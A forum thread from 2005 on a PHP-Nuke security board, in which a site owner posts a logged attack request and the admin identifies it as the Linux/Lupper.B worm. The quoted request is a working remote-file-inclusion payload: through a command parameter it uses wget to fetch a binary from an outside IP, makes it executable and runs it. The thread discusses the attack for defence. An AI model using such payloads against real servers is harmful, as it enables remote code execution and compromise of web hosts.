Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke
Author Message
BriX
Hangin' Around



Joined: Dec 04, 2005
Posts: 31

PostPosted: Wed Dec 21, 2005 9:23 pm Reply with quote

I have recently noticed several tracked ips attempting the following:

**siteurl**/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST

=Array&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen

;chmod%20744%20listen;./listen;echo%20YYY;echo|

If you can explain to me what is being attempted/done and a security assessment that would be much appreciated. Thanks.
 
View user's profile Send private message
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

PostPosted: Wed Dec 21, 2005 9:49 pm Reply with quote

This is the Linux/Lupper.B worm. Here are a few links to info about it. There's quite a bit on Google about it.
[ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]
 
View user's profile Send private message
Stray_Bullet
New Member
New Member



Joined: Nov 13, 2004
Posts: 17

PostPosted: Thu Dec 22, 2005 4:55 pm Reply with quote

Thanks for the links Raven!

I have been seeing alot of this constantly! I use mod_security to block these kind of requests!
 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - PHP Nuke

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©